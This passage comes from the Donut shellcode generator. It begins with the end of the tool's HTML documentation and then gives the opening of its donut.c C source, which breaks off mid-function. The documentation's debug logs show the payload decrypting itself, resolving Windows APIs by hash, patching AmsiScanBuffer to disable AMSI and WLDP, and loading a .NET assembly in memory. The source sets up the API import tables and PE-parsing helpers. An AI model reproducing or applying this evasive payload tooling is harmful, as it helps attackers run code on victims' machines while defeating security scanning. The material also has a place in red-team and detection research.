286 | <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span> | |
287 | </pre> | |
288 | ||
289 | <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p> | |
290 | ||
291 | <h3>Debugging payload</h3> | |
292 | ||
293 | <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p> | |
294 | ||
295 | <pre> | |
296 | nmake debug -f Makefile.msvc | |
297 | make debug -f Makefile.mingw | |
298 | </pre> | |
299 | ||
300 | <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p> | |
301 | ||
302 | <pre> | |
303 | c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe | |
304 | ||
305 | [ Donut shellcode generator v0.9.2 | |
306 | [ Copyright (c) 2019 TheWover, Odzhan | |
307 | ||
308 | DEBUG: donut.c:822:DonutCreate(): Entering. | |
309 | DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file | |
310 | DEBUG: donut.c:840:DonutCreate(): Validating instance type | |
311 | DEBUG: donut.c:880:DonutCreate(): Validating architecture | |
312 | DEBUG: donut.c:277:get_file_info(): Entering. | |
313 | DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll | |
314 | DEBUG: donut.c:293:get_file_info(): Extension is ".dll" | |
315 | DEBUG: donut.c:320:get_file_info(): Module is DLL | |
316 | DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory | |
317 | DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll | |
318 | DEBUG: donut.c:231:map_file(): Opening Class1.dll | |
319 | DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll | |
320 | DEBUG: donut.c:336:get_file_info(): Checking DOS header | |
321 | DEBUG: donut.c:342:get_file_info(): Checking NT header | |
322 | DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY | |
323 | DEBUG: donut.c:356:get_file_info(): Checking characteristics | |
324 | DEBUG: donut.c:368:get_file_info(): COM Directory found | |
325 | DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319 | |
326 | DEBUG: donut.c:395:get_file_info(): Leaving. | |
327 | DEBUG: donut.c:944:DonutCreate(): Creating module | |
328 | DEBUG: donut.c:516:CreateModule(): Entering. | |
329 | DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE | |
330 | DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T | |
331 | DEBUG: donut.c:549:CreateModule(): Class : TestClass | |
332 | DEBUG: donut.c:552:CreateModule(): Method : RunProcess | |
333 | DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319 | |
334 | DEBUG: donut.c:584:CreateModule(): Adding "calc.exe" | |
335 | DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe" | |
336 | DEBUG: donut.c:610:CreateModule(): Leaving. | |
337 | DEBUG: donut.c:951:DonutCreate(): Creating instance | |
338 | DEBUG: donut.c:621:CreateInstance(): Entering. | |
339 | DEBUG: donut.c:624:CreateInstance(): Allocating space for instance | |
340 | DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance. | |
341 | DEBUG: donut.c:643:CreateInstance(): Generating random key for instance | |
342 | DEBUG: donut.c:649:CreateInstance(): Generating random key for module | |
343 | DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption | |
344 | DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash | |
345 | DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10 | |
346 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821 | |
347 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85 | |
348 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391 | |
349 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E | |
350 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4 | |
351 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32 | |
352 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016 | |
353 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5 | |
354 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755 | |
355 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7 | |
356 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED | |
357 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC | |
358 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0 | |
359 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E | |
360 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6 | |
361 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C | |
362 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB | |
363 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6 | |
364 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C | |
365 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1 | |
366 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3 | |
367 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2 | |
368 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F | |
369 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A | |
370 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755 | |
371 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5 | |
372 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31 | |
373 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04 | |
374 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7 | |
375 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5 | |
376 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C | |
377 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B | |
378 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2 | |
379 | DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies | |
380 | DEBUG: donut.c:791:CreateInstance(): Copying module data to instance | |
381 | DEBUG: donut.c:796:CreateInstance(): encrypting instance | |
382 | DEBUG: donut.c:808:CreateInstance(): Leaving. | |
383 | DEBUG: donut.c:959:DonutCreate(): Saving instance to file | |
384 | DEBUG: donut.c:992:DonutCreate(): PIC size : 33050 | |
385 | DEBUG: donut.c:999:DonutCreate(): Inserting opcodes | |
386 | DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode | |
387 | DEBUG: donut.c:259:unmap_file(): Unmapping | |
388 | DEBUG: donut.c:262:unmap_file(): Closing | |
389 | DEBUG: donut.c:1061:DonutCreate(): Leaving. | |
390 | [ Instance type : PIC | |
391 | [ Module file : "Class1.dll" | |
392 | [ File type : .NET DLL | |
393 | [ Class : TestClass | |
394 | [ Method : RunProcess | |
395 | [ Parameters : calc.exe,notepad.exe | |
396 | [ Target CPU : x86+AMD64 | |
397 | [ Shellcode : "payload.bin" | |
398 | ||
399 | DEBUG: donut.c:1069:DonutDelete(): Entering. | |
400 | DEBUG: donut.c:1088:DonutDelete(): Leaving. | |
401 | </pre> | |
402 | ||
403 | <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p> | |
404 | ||
405 | <pre> | |
406 | c:\hub\donut\payload>payload ..\instance | |
407 | Running... | |
408 | DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E | |
409 | DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7 | |
410 | DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985 | |
411 | DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0 | |
412 | DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory | |
413 | DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000 | |
414 | DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY | |
415 | DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance | |
416 | DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption | |
417 | DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f | |
418 | DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA | |
419 | DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ... | |
420 | DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ... | |
421 | DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ... | |
422 | DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ... | |
423 | DEBUG: payload.c:108:ThreadProc(): Resolving 33 API | |
424 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92 | |
425 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5 | |
426 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7 | |
427 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985 | |
428 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834 | |
429 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F | |
430 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53 | |
431 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B | |
432 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050 | |
433 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD | |
434 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6 | |
435 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470 | |
436 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6 | |
437 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38 | |
438 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B | |
439 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F | |
440 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A | |
441 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E | |
442 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811 | |
443 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C | |
444 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85 | |
445 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E | |
446 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA | |
447 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1 | |
448 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A | |
449 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733 | |
450 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A | |
451 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749 | |
452 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F | |
453 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255 | |
454 | DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx | |
455 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
456 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx) | |
457 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407 | |
458 | DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance | |
459 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
460 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance) | |
461 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8 | |
462 | DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize | |
463 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
464 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize) | |
465 | DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance | |
466 | DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance | |
467 | DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance | |
468 | DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319") | |
469 | DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable | |
470 | DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface | |
471 | DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000 | |
472 | DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start | |
473 | DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M") | |
474 | DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface | |
475 | DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes. | |
476 | DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer | |
477 | DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes. | |
478 | DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK | |
479 | DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK | |
480 | DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array | |
481 | DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3 | |
482 | DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000 | |
483 | DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory | |
484 | DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy | |
485 | DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance | |
486 | DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL | |
487 | DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass") | |
488 | DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess") | |
489 | DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2 | |
490 | DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s)) | |
491 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1 | |
492 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2 | |
493 | DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3 | |
494 | DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success | |
495 | DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release | |
496 | DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release | |
497 | DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release | |
498 | DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release | |
499 | DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop | |
500 | DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release | |
501 | DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release | |
502 | DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release | |
503 | DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance | |
504 | DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance | |
505 | </pre> | |
506 | ||
507 | <p>Obviously you should be cautious with what files you decide to execute on your machine.</p> | |
508 | ||
509 | </body> | |
510 | </html> |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "donut.h" | |
32 | ||
33 | #include "payload/payload_exe_x86.h" | |
34 | #include "payload/payload_exe_x64.h" | |
35 | ||
36 | #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; } | |
37 | #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; } | |
38 | #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; } | |
39 | #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; } | |
40 | ||
41 | // these have to be in same order as DONUT_INSTANCE structure in donut.h | |
42 | static API_IMPORT api_imports[]= | |
43 | { | |
44 | {KERNEL32_DLL, "LoadLibraryA"}, | |
45 | {KERNEL32_DLL, "GetProcAddress"}, | |
46 | {KERNEL32_DLL, "GetModuleHandleA"}, | |
47 | {KERNEL32_DLL, "VirtualAlloc"}, | |
48 | {KERNEL32_DLL, "VirtualFree"}, | |
49 | {KERNEL32_DLL, "VirtualQuery"}, | |
50 | {KERNEL32_DLL, "VirtualProtect"}, | |
51 | {KERNEL32_DLL, "Sleep"}, | |
52 | {KERNEL32_DLL, "MultiByteToWideChar"}, | |
53 | {KERNEL32_DLL, "GetUserDefaultLCID"}, | |
54 | ||
55 | {OLEAUT32_DLL, "SafeArrayCreate"}, | |
56 | {OLEAUT32_DLL, "SafeArrayCreateVector"}, | |
57 | {OLEAUT32_DLL, "SafeArrayPutElement"}, | |
58 | {OLEAUT32_DLL, "SafeArrayDestroy"}, | |
59 | {OLEAUT32_DLL, "SafeArrayGetLBound"}, | |
60 | {OLEAUT32_DLL, "SafeArrayGetUBound"}, | |
61 | {OLEAUT32_DLL, "SysAllocString"}, | |
62 | {OLEAUT32_DLL, "SysFreeString"}, | |
63 | {OLEAUT32_DLL, "LoadTypeLib"}, | |
64 | ||
65 | {WININET_DLL, "InternetCrackUrlA"}, | |
66 | {WININET_DLL, "InternetOpenA"}, | |
67 | {WININET_DLL, "InternetConnectA"}, | |
68 | {WININET_DLL, "InternetSetOptionA"}, | |
69 | {WININET_DLL, "InternetReadFile"}, | |
70 | {WININET_DLL, "InternetCloseHandle"}, | |
71 | {WININET_DLL, "HttpOpenRequestA"}, | |
72 | {WININET_DLL, "HttpSendRequestA"}, | |
73 | {WININET_DLL, "HttpQueryInfoA"}, | |
74 | ||
75 | {MSCOREE_DLL, "CorBindToRuntime"}, | |
76 | {MSCOREE_DLL, "CLRCreateInstance"}, | |
77 | ||
78 | {OLE32_DLL, "CoInitializeEx"}, | |
79 | {OLE32_DLL, "CoCreateInstance"}, | |
80 | {OLE32_DLL, "CoUninitialize"}, | |
81 | ||
82 | { NULL, NULL } | |
83 | }; | |
84 | ||
85 | // required to load .NET assemblies | |
86 | static GUID xCLSID_CorRuntimeHost = { | |
87 | 0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}}; | |
88 | ||
89 | static GUID xIID_ICorRuntimeHost = { | |
90 | 0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e}}; | |
91 | ||
92 | static GUID xCLSID_CLRMetaHost = { | |
93 | 0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde}}; | |
94 | ||
95 | static GUID xIID_ICLRMetaHost = { | |
96 | 0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16}}; | |
97 | ||
98 | static GUID xIID_ICLRRuntimeInfo = { | |
99 | 0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91}}; | |
100 | ||
101 | static GUID xIID_AppDomain = { | |
102 | 0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13}}; | |
103 | ||
104 | // required to load VBS and JS files | |
105 | static GUID xIID_IUnknown = { | |
106 | 0x00000000, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}}; | |
107 | ||
108 | static GUID xIID_IDispatch = { | |
109 | 0x00020400, 0x0000, 0x0000, {0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}}; | |
110 | ||
111 | static GUID xIID_IHost = { | |
112 | 0x91afbd1b, 0x5feb, 0x43f5, {0xb0, 0x28, 0xe2, 0xca, 0x96, 0x06, 0x17, 0xec}}; | |
113 | ||
114 | static GUID xIID_IActiveScript = { | |
115 | 0xbb1a2ae1, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
116 | ||
117 | static GUID xIID_IActiveScriptSite = { | |
118 | 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
119 | ||
120 | static GUID xIID_IActiveScriptParse32 = { | |
121 | 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}}; | |
122 | ||
123 | static GUID xIID_IActiveScriptParse64 = { | |
124 | 0xc7ef7658, 0xe1ee, 0x480e, {0x97, 0xea, 0xd5, 0x2c, 0xb4, 0xd7, 0x6d, 0x17}}; | |
125 | ||
126 | static GUID xCLSID_VBScript = { | |
127 | 0xB54F3741, 0x5B07, 0x11cf, {0xA4, 0xB0, 0x00, 0xAA, 0x00, 0x4A, 0x55, 0xE8}}; | |
128 | ||
129 | static GUID xCLSID_JScript = { | |
130 | 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}}; | |
131 | ||
132 | // required to load XSL files | |
133 | static GUID xCLSID_DOMDocument30 = { | |
134 | 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}}; | |
135 | ||
136 | static GUID xIID_IXMLDOMDocument = { | |
137 | 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}}; | |
138 | ||
139 | static GUID xIID_IXMLDOMNode = { | |
140 | 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}}; | |
141 | ||
142 | #if defined(_WIN32) | defined(_WIN64) | |
143 | #include "include/mmap-windows.c" | |
144 | #ifdef _MSC_VER | |
145 | #define strcasecmp stricmp | |
146 | #endif | |
147 | #endif | |
148 | ||
149 | // return pointer to DOS header | |
150 | static PIMAGE_DOS_HEADER DosHdr(void *map) { | |
151 | return (PIMAGE_DOS_HEADER)map; | |
152 | } | |
153 | ||
154 | // return pointer to NT headers | |
155 | static PIMAGE_NT_HEADERS NtHdr (void *map) { | |
156 | return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew); | |
157 | } | |
158 | ||
159 | // return pointer to File header | |
160 | static PIMAGE_FILE_HEADER FileHdr (void *map) { | |
161 | return &NtHdr(map)->FileHeader; | |
162 | } | |
163 | ||
164 | // determines CPU architecture of binary | |
165 | static int is32 (void *map) { | |
166 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386; | |
167 | } | |
168 | ||
169 | // return pointer to Optional header | |
170 | static void* OptHdr (void *map) { | |
171 | return (void*)&NtHdr(map)->OptionalHeader; | |
172 | } | |
173 | ||
174 | static PIMAGE_DATA_DIRECTORY Dirs (void *map) { | |
175 | if (is32(map)) { | |
176 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory; | |
177 | } else { | |
178 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory; | |
179 | } | |
180 | } | |
181 | ||
182 | // valid dos header? | |
183 | static int valid_dos_hdr (void *map) { | |
184 | PIMAGE_DOS_HEADER dos = DosHdr(map); | |
185 | ||
186 | if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0; | |
187 | return (dos->e_lfanew != 0); | |
188 | } | |
189 | ||
190 | // valid nt headers | |
191 | static int valid_nt_hdr (void *map) { | |
192 | return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE; | |
193 | } | |
194 | ||
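// Translate a relative virtual address into a file offset by finding the
// section whose raw data contains it.
//
// base : start of the mapped image. Only the DOS header, NT headers and
//        section table are read; the caller must already have checked that
//        those lie inside the mapping (get_file_info() does this).
// rva  : address relative to the image base.
//
// Returns the file offset, or (ULONG64)-1 (all bits set) when no section
// covers the RVA. The offset is NOT checked against the file size, because
// this function does not know it; callers must bound-check before
// dereferencing base + offset.
static ULONG64 rva2ofs (void *base, DWORD rva) {
    PIMAGE_DOS_HEADER     dos = (PIMAGE_DOS_HEADER)base;
    PIMAGE_NT_HEADERS     nt  = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sh  = IMAGE_FIRST_SECTION(nt);
    DWORD                 i;

    for (i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        // Compare the distance into the section rather than
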